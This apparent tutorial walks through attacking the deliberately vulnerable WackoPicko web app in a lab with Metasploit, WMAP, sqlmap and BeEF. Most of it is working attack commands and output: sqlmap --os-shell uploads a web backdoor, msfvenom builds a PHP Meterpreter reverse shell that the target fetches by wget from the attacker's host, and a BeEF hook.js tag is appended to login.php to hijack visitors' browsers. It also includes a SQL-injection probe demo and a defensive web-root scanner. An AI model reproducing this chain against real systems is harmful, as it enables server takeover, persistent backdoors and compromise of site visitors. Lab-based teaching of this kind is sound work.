By Sumedt Jitpukdebodin
Normally a penetration tester or attacker uses Metasploit to exploit vulnerable services on a target server, or to generate a payload that plants a backdoor on a server that has already been compromised. But Metasploit has grown through many plugins and modules and can now do more than that: it can be used to pentest web applications too.
In this article I will show how to use Metasploit to scan a web server for information and to run a vulnerability assessment of a web application.
Scenario
In this article we attack a vulnerable server and then the clients who use it. The characters in the scenario are:
1. Attacker machine: BackTrack 5 R3, 192.168.77.137
2. Target: the WackoPicko web application (one of the sites in OWASP Broken Web Applications v1.0), 192.168.77.138
All commands below use these addresses; substitute your own lab addresses.
Scanning Phase
The first thing to do when you want to attack a server is to gather as much information about the target as you can, so the first step is to scan it. Metasploit has the "db_nmap" command, which runs nmap (the best-known port scanner) and stores its results in the Metasploit database so that later modules can use them. Follow these steps:
1. Open the Metasploit console.
root@bt:/# msfconsole
2. In the Metasploit console run db_nmap against the IP address of the target machine. db_nmap needs a connected database, so check db_status first if it complains.
msf > db_nmap
[*] Usage: db_nmap [nmap options]
msf > db_nmap 192.168.77.138
3. Check the scan result with the "hosts" command.
msf > hosts -h
msf > hosts
4. Use the "services" command to see details of the discovered services. The columns it can display are created_at, info, name, port, proto, state and updated_at.
msf > services -h
msf > services
msf > services -c port,name,state
The result shows that the target runs a web service. Metasploit also has a module for crawling a website.
1. Select the auxiliary/scanner/http/crawler module.
msf > use auxiliary/scanner/http/crawler
2. Set the target with RHOST (run show options to confirm the option names in your version). Since this article focuses on the WackoPicko application, restrict the crawl to it with URI.
msf auxiliary(crawler) > set RHOST 192.168.77.138
msf auxiliary(crawler) > set URI /WackoPicko/
3. Start crawling the website.
msf auxiliary(crawler) > run
At the end of this phase you have information about both the server and the web application. In the next phase we use that information to attack it.
Exploit Phase
In this phase we attack the application with Metasploit's vulnerability scanning plugin and then combine Metasploit with other attack tools.
WMAP Plugin
"WMAP is a general purpose web application scanning framework for Metasploit 3. The architecture is simple and its simplicity is what makes it powerful. It's a different approach compared to other open source alternatives and commercial scanners, as WMAP is not build around any browser or spider for data capture and manipulation." We will use this plugin to scan the website for vulnerabilities. The steps are:
1. Load the wmap plugin.
msf auxiliary(crawler) > load wmap
2. During the scanning phase we already crawled the site and stored everything in the database. WMAP reads that data to learn the structure of the web application; list the sites it knows about with wmap_sites.
msf auxiliary(crawler) > wmap_sites
msf auxiliary(crawler) > wmap_sites -l
3. To see the structure of a web application, use wmap_sites -s with the site id.
wmap_sites -s [target_id]
msf auxiliary(crawler) > wmap_sites -s 0
4. Now we are ready to scan, so define the target with wmap_targets (-t takes the target URL).
msf auxiliary(crawler) > wmap_targets
msf auxiliary(crawler) > wmap_targets -t http://192.168.77.138/WackoPicko/
5. Start the automated vulnerability scan with wmap_run (-t lists the modules that will run, -e executes them).
msf auxiliary(crawler) > wmap_run
msf auxiliary(crawler) > wmap_run -e
6. When the scan finishes, list its findings with wmap_vulns.
msf auxiliary(crawler) > wmap_vulns -l
The results reveal some weaknesses of this web application, such as a "sensitive file or directory", an "admin directory", a "backup directory", a "SQL injection vulnerable page", and so on. Now you can use these results to attack it.
SQL Injection with Metasploit
If you want to check whether a parameter is vulnerable to SQL injection, Metasploit can do that too. I will use the auxiliary/scanner/http/blind_sql_query module for this test.
1. From the WMAP scan we know that http://192.168.77.138/WackoPicko/users/login.php is reported as SQL-injectable and that it takes two parameters, username and password. Now we test the username parameter with auxiliary/scanner/http/blind_sql_query.
msf > use auxiliary/scanner/http/blind_sql_query
msf auxiliary(blind_sql_query) > show options
2. Describe the target page: the POST body, the method, the path and the host.
msf auxiliary(blind_sql_query) > set DATA username=hacker&password=password&submit=login
msf auxiliary(blind_sql_query) > set METHOD POST
msf auxiliary(blind_sql_query) > set PATH /WackoPicko/users/login.php
msf auxiliary(blind_sql_query) > set RHOSTS 192.168.77.138
3. Start the test.
msf auxiliary(blind_sql_query) > run
The result is that the "username" parameter is vulnerable to SQL injection. The module works by appending conditions that evaluate to true and to false and comparing the responses with the original one, so it can only detect the flaw when the original request produces a page that a failed condition changes. You can test the error-based technique with the auxiliary/scanner/http/error_sql_injection module.
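To make the boolean-based blind check concrete, here is an added example (my own code, not part of the original article or of Metasploit's blind_sql_query module). It runs the same true/false probe that the module and sqlmap use against a login function backed by an in-memory SQLite table; the table, its two accounts and the function names are constructed for the example and are not WackoPicko's real schema or data. It places the string-concatenated query beside its parameterised replacement so you can see the probe succeed on one and fail on the other, and it shows why the probe needs a request that already succeeds.

```python
import sqlite3
from typing import Callable, Optional

# Constructed sample data: two accounts seeded into an in-memory SQLite database
# so the example runs offline. This is not WackoPicko's schema or data.
SEED_USERS = [("hacker", "password"), ("admin", "s3cret")]


def new_db() -> sqlite3.Connection:
    """Build the sample users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SEED_USERS)
    return conn


def vulnerable_login(conn: sqlite3.Connection, username: str, password: str) -> str:
    """Login built by string concatenation: attacker-supplied quotes become SQL."""
    query = ("SELECT username FROM users WHERE username='" + username
             + "' AND password='" + password + "'")
    try:
        row = conn.execute(query).fetchone()
    except sqlite3.Error:
        return "Database error"   # the kind of page error-based injection relies on
    return "Welcome " + row[0] if row else "Login failed"


def hardened_login(conn: sqlite3.Connection, username: str, password: str) -> str:
    """Same check with a parameterised query: input can never change the SQL."""
    row = conn.execute(
        "SELECT username FROM users WHERE username=? AND password=?",
        (username, password),
    ).fetchone()
    return "Welcome " + row[0] if row else "Login failed"


# True/false condition pairs appended to the username, in the same shape as the
# payload sqlmap reports for this page (username=hacker' AND 2163=2163 AND 'YJxM'='YJxM).
PROBE_PAIRS = [
    ("' AND 1=1 AND 'a'='a", "' AND 1=2 AND 'a'='a"),   # string context
    (" AND 1=1", " AND 1=2"),                            # numeric context
]


def boolean_blind_probe(login: Callable[[str, str], str],
                        username: str, password: str) -> Optional[str]:
    """Boolean-based blind test of the username parameter.

    The parameter is injectable when the TRUE condition leaves the page unchanged
    while the FALSE condition changes it. Returns the suffix that flipped the page,
    or None. The baseline request must itself return a distinguishable page (here a
    successful login); with a failed baseline, TRUE and FALSE look identical.
    """
    baseline = login(username, password)
    for true_sfx, false_sfx in PROBE_PAIRS:
        if (login(username + true_sfx, password) == baseline
                and login(username + false_sfx, password) != baseline):
            return true_sfx
    return None


if __name__ == "__main__":
    conn = new_db()
    for name, fn in (("vulnerable", vulnerable_login), ("hardened", hardened_login)):
        hit = boolean_blind_probe(lambda u, p: fn(conn, u, p), "hacker", "password")
        print(name, "->", "injectable with %r" % hit if hit else "not injectable")
```

Run it and the concatenated login is reported injectable with the string-context suffix while the parameterised one is not; probing the vulnerable login with a wrong password finds nothing, which is the caveat the module shares with sqlmap.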
Now that we know the "username" parameter of users/login.php is injectable, we use it to take over the server with sqlmap. sqlmap is the best-known SQL injection tool and it works well alongside Metasploit.
1. We use these sqlmap options for the attack:
-u URL            Target URL
--data=DATA       Data string to be sent through POST
--random-agent    Use a randomly selected HTTP User-Agent header (optional)
--os-shell        Prompt for an interactive operating system shell
2. Now run sqlmap with the details we have. If the database account the application uses has enough privileges (for MySQL this means the FILE privilege and a directory under the web root that the database server can write to), you get a shell. The output below is from the sqlmap run that uploads the shell.
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://192.168.77.138/WackoPicko/users/login.php" --data "username=hacker&password=password&submit=login" --os-shell

sqlmap/1.0-dev-4649450 - automatic SQL injection and database takeover tool
http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 10:21:05

[10:21:05] [INFO] resuming back-end DBMS 'mysql'
[10:21:05] [INFO] testing connection to the target url
sqlmap got a 303 redirect to 'http://192.168.77.138:80/WackoPicko/users/home.php'. Do you want to follow? [Y/n] Y
[10:21:07] [INFO] heuristics detected web page charset 'None'
[10:21:07] [INFO] heuristics detected web page charset 'ascii'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: username
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: username=hacker' AND 2163=2163 AND 'YJxM'='YJxM&password=password&submit=login

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: username=hacker' AND (SELECT 3246 FROM(SELECT COUNT(*),CONCAT(0x3a6377663a,(SELECT (CASE WHEN (3246=3246) THEN 1 ELSE 0 END)),0x3a6268653a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'oBNd'='oBNd&password=password&submit=login
---
[10:21:07] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5
[10:21:07] [INFO] going to use a web backdoor for command prompt
[10:21:07] [INFO] fingerprinting the back-end DBMS operating system
[10:21:07] [INFO] the back-end DBMS operating system is Linux
[10:21:07] [INFO] trying to upload the file stager
which web application language does the web server support?
[1] ASP
[2] ASPX
[3] PHP (default)
[4] JSP
> 3
[10:21:09] [WARNING] unable to retrieve the web server document root
please provide the web server document root [/var/www/]:
[10:21:10] [WARNING] unable to retrieve any web server path
please provide any additional web server full path to try to upload the agent [Enter for None]:
[10:21:10] [WARNING] unable to upload the file stager on '/var/www'
[10:21:10] [INFO] the file stager has been successfully uploaded on '/var/www/WackoPicko/users' - http://192.168.77.138:80/WackoPicko/users/tmputgqe.php
[10:21:10] [INFO] the backdoor has been successfully uploaded on '/var/www/WackoPicko/users' - http://192.168.77.138:80/WackoPicko/users/tmpblzgg.php
[10:21:10]
Now that we have a shell on the target machine, we create a backdoor so it is easier to connect back and to go further on this machine.
3. Create the backdoor with Metasploit's msfvenom command. Running msfvenom without options prints its usage:
root@bt:~# msfvenom
no options
Usage: /opt/metasploit/msf3/msfvenom [options] <var=val>
Options:
    -p, --payload    [payload]       Payload to use. Specify a '-' or stdin to use custom payloads
    -l, --list       [module_type]   List a module type example: payloads, encoders, nops, all
    -n, --nopsled    [length]        Prepend a nopsled of [length] size on to the payload
    -f, --format     [format]        Output format (use --help-formats for a list)
    -e, --encoder    [encoder]       The encoder to use
    -a, --arch       [architecture]  The architecture to use
        --platform   [platform]      The platform of the payload
    -s, --space      [length]        The maximum size of the resulting payload
    -b, --bad-chars  [list]          The list of characters to avoid example: '\x00\xff'
    -i, --iterations [count]         The number of times to encode the payload
    -c, --add-code   [path]          Specify an additional win32 shellcode file to include
    -x, --template   [path]          Specify a custom executable file to use as a template
    -k, --keep                       Preserve the template behavior and inject the payload as a new thread
    -o, --options                    List the payload's standard options
    -h, --help                       Show this message
        --help-formats               List available formats
Generate a PHP Meterpreter reverse shell in raw format, write it into the attacker's web root and rename it to bd.jpg. Apache must be running on the attacker so the target can fetch the file in the next step.
root@bt:~# msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.77.137 LPORT=443 -f raw > /var/www/bd.php
root@bt:~# mv /var/www/bd.php /var/www/bd.jpg
4. In the shell on the target machine, download the backdoor and rename it back to bd.php.
os-shell> wget http://192.168.77.137/bd.jpg
do you want to retrieve the command standard output? [Y/n/a] Y
command standard output:
---
--2012-08-26 23:47:21--  http://192.168.77.137/bd.php
Connecting to 192.168.77.137:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 10 [text/html]
Saving to: `bd.php'
     0K                                                       100% 2.04M=0s
2012-08-26 23:47:21 (2.04 MB/s) - `bd.php' saved [10/10]
---
os-shell> pwd
do you want to retrieve the command standard output? [Y/n/a] y
command standard output:    '/owaspbwa/owaspbwasvn/var/www/WackoPicko/users'
os-shell> mv bd.jpg bd.php
do you want to retrieve the command standard output? [Y/n/a] y
No output
5. Start a handler to wait for the connection back from bd.php. (msfcli has since been removed from Metasploit; on current versions start the same handler with msfconsole -x "use multi/handler; set PAYLOAD php/meterpreter/reverse_tcp; set LHOST 192.168.77.137; set LPORT 443; run".)
root@bt:~# msfcli multi/handler PAYLOAD=php/meterpreter/reverse_tcp LHOST=192.168.77.137 LPORT=443 E
[*] Please wait while we load the module tree...

       =[ metasploit v4.5.0-dev [core:4.5 api:1.0]
+ -- --=[ 932 exploits - 499 auxiliary - 151 post
+ -- --=[ 251 payloads - 28 encoders - 8 nops
       =[ svn r15753 updated 11 days ago (2012.08.16)

Warning: This copy of the Metasploit Framework was last updated 11 days ago.
We recommend that you update the framework at least every other day.
For information on updating your copy of Metasploit, please see:
https://community.rapid7.com/docs/DOC-1306

PAYLOAD => php/meterpreter/reverse_tcp
LHOST => 192.168.77.137
LPORT => 443
[*] Started reverse handler on 192.168.77.137:443
[*] Starting the payload handler...
6. Open the backdoor in your web browser; it sits in the same directory as the sqlmap stager, so the URL is http://192.168.77.138/WackoPicko/users/bd.php. A Meterpreter session then appears in the Metasploit console:
[*] Sending stage (39217 bytes) to 192.168.77.138
[*] Meterpreter session 1 opened (192.168.77.137:443 -> 192.168.77.138:42757) at 2012-08-27 11:05:31 +0700
meterpreter >
You now own the machine and can do whatever you want with Metasploit. Next we use BeEF to compromise the victims who visit this machine's website.
Metasploit with BeEF plugin
In the last part of this article we use Metasploit together with BeEF (the Browser Exploitation Framework). What is BeEF? "BeEF hooks one or more web browsers as beachheads for the launching of directed command modules. Each browser is likely to be within a different security context, and each context may provide a set of unique attack vectors."
1. Run the BeEF service.
root@bt:/pentest/web/beef# ./beef -x -v
2. Go to the Metasploit directory and download the BeEF plugin for Metasploit from https://github.com/xntrik/beefmetasploitplugin.git
root@bt:~# cd /pentest/exploits/framework/msf3
root@bt:/pentest/exploits/framework/msf3# git clone https://github.com/xntrik/beefmetasploitplugin.git
Initialized empty Git repository in /opt/metasploit/msf3/beefmetasploitplugin/.git/
3. Move beef.rb into the plugins directory and lib/beef into lib.
root@bt:/pentest/exploits/framework/msf3# mv beefmetasploitplugin/lib/beef lib/
root@bt:/pentest/exploits/framework/msf3# mv beefmetasploitplugin/plugins/beef.rb plugins/
4. Install the hpricot and json gems.
root@bt:/pentest/exploits/framework/msf3# gem install hpricot json
5. In the Metasploit console, load the BeEF plugin.
msf > load beef
6. Connect to BeEF, giving its URL, username and password (beef/beef here).
msf > beef_connect
msf > beef_connect http://127.0.0.1:3000 beef beef
7. In this step we want every client who visits the login page to run the BeEF hook. Go back to the Meterpreter session obtained at the end of the sqlmap attack, download login.php, append the tag <script src='http://192.168.77.137:3000/hook.js'></script> to it and upload it back to the host. Check with pwd that the session's working directory is the users directory that holds login.php, since the commands below use "." as the path.
meterpreter > download login.php .
[*] downloading: login.php -> ./login.php
[*] downloaded : login.php -> ./login.php
root@bt:~# echo "<script src='http://192.168.77.137:3000/hook.js'></script>" >> login.php
meterpreter > upload login.php .
[*] uploading  : login.php -> .
[*] uploaded   : login.php -> ./login.php
meterpreter >
Now whenever a victim visits the login page, the BeEF hook script runs in their browser.
8. Open the BeEF web management interface (http://127.0.0.1:3000/ui/panel) and log in with username "beef" and password "beef".
9. When someone visits login.php, their browser is hooked by BeEF and appears in the list of victims in the left panel.
To see the details of a victim, click it; they appear in the right panel.
You can also list the hooked browsers from the Metasploit console with beef_online.
msf > beef_online
And to see a victim's details in the Metasploit console, use beef_target.
msf > beef_target
msf > beef_target -i 0
10. Now you can run BeEF command modules against a victim with beef_target -c, giving the target id and the command module id.
msf > beef_target -c 0 47
After this beef_target command runs, BeEF's console shows it sending the "Man-In-The-Browser" command module to the victim.
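The attack chain above leaves three kinds of artifact in the web root: sqlmap's tmpXXXXX.php stager and backdoor, the bd.php Meterpreter payload, and the hook.js script tag appended to login.php. As an added example, which is not part of the article or of any tool it uses, the following Python script checks a document root for those artifacts. The sample web root it builds, the file contents and the list of flagged PHP functions are constructed for the example rather than copied from sqlmap or msfvenom output, and the regular expressions are heuristics that will also match some legitimate code.

```python
import os
import re
import tempfile
from typing import Dict, List, Set, Tuple

# Script tags that load from an absolute http(s) URL; group 2 is the host.
# Anything outside the allow-list is reported, which catches the hook.js line.
EXTERNAL_SCRIPT = re.compile(
    r"""<script\b[^>]*\bsrc\s*=\s*["']?\s*(https?://([^/:"'\s>]+)[^"'\s>]*)""", re.I)
# PHP calls typical of upload stagers, web shells and reverse-connect payloads.
# Heuristic: legitimate code can use these too, so findings need review.
SUSPICIOUS_PHP = re.compile(
    r"\b(eval|base64_decode|move_uploaded_file|shell_exec|system|passthru|popen"
    r"|proc_open|fsockopen|socket_create)\s*\(", re.I)
# The sqlmap transcript above uploaded tmputgqe.php and tmpblzgg.php:
# "tmp" plus five lowercase letters.
SQLMAP_TMP_NAME = re.compile(r"^tmp[a-z]{5}\.php$")


def scan_webroot(root: str, allowed_hosts: Set[str]) -> List[Tuple[str, str]]:
    """Walk a document root and return (relative path, reason) for suspicious files."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith((".php", ".html", ".htm")):
                continue
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            with open(path, "r", encoding="utf-8", errors="replace") as fh:
                content = fh.read()
            if SQLMAP_TMP_NAME.match(name):
                findings.append((rel, "sqlmap-style temporary PHP file name"))
            for m in SUSPICIOUS_PHP.finditer(content):
                findings.append((rel, "dangerous PHP call %s()" % m.group(1).lower()))
                break  # one reason per file for this check
            for m in EXTERNAL_SCRIPT.finditer(content):
                if m.group(2).lower() not in allowed_hosts:
                    findings.append((rel, "script loaded from external host " + m.group(2)))
    return sorted(findings)


# Constructed sample web root modelled on the files this article leaves behind.
# The file bodies are stand-ins, not real sqlmap or msfvenom output.
SAMPLE_FILES: Dict[str, str] = {
    "WackoPicko/users/login.php": (
        "<html><body><form method='post'>\n"
        "<input name='username'><input name='password'><input type='submit' name='submit'>\n"
        "</form></body></html>\n"
        "<script src='http://192.168.77.137:3000/hook.js'></script>\n"),
    "WackoPicko/users/tmputgqe.php": (
        "<?php if (isset($_FILES['f'])) { move_uploaded_file($_FILES['f']['tmp_name'], "
        "$_FILES['f']['name']); } ?>\n"),
    "WackoPicko/users/bd.php": (
        "<?php error_reporting(0); $s = fsockopen('192.168.77.137', 443); "
        "eval(fread($s, 4096)); ?>\n"),
    "WackoPicko/index.php": (
        "<?php echo 'Welcome to WackoPicko'; ?>\n"
        "<script src='/WackoPicko/js/app.js'></script>\n"),   # relative src: clean
}


def build_sample_webroot() -> str:
    """Write the constructed files into a fresh temporary directory and return its path."""
    root = tempfile.mkdtemp(prefix="webroot-")
    for rel, body in SAMPLE_FILES.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
    root = build_sample_webroot()
    # Only the target itself may serve scripts; the attacker's host is not allowed.
    for rel, reason in scan_webroot(root, allowed_hosts={"192.168.77.138"}):
        print("%-32s %s" % (rel, reason))
```

Point scan_webroot at a real document root with the hosts your pages legitimately load scripts from; on a live server, compare the output against a previous run or against package-managed files, since the PHP call list is deliberately broad.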
Conclusion
Now you know that Metasploit can do a great deal of the work of a web application penetration test, but it has limits too. It cannot test every class of web application vulnerability, but it complements other tools: it does not test for Cross-Site Scripting, yet combined with BeEF it can take over the clients; it does not test for Remote File Inclusion, yet it can generate the PHP backdoor payload to use through one. In the future I think Metasploit may be able to test all of them. If you want to start learning how attacks on computers work, Metasploit is a great choice for learning about the attack surface of a computer.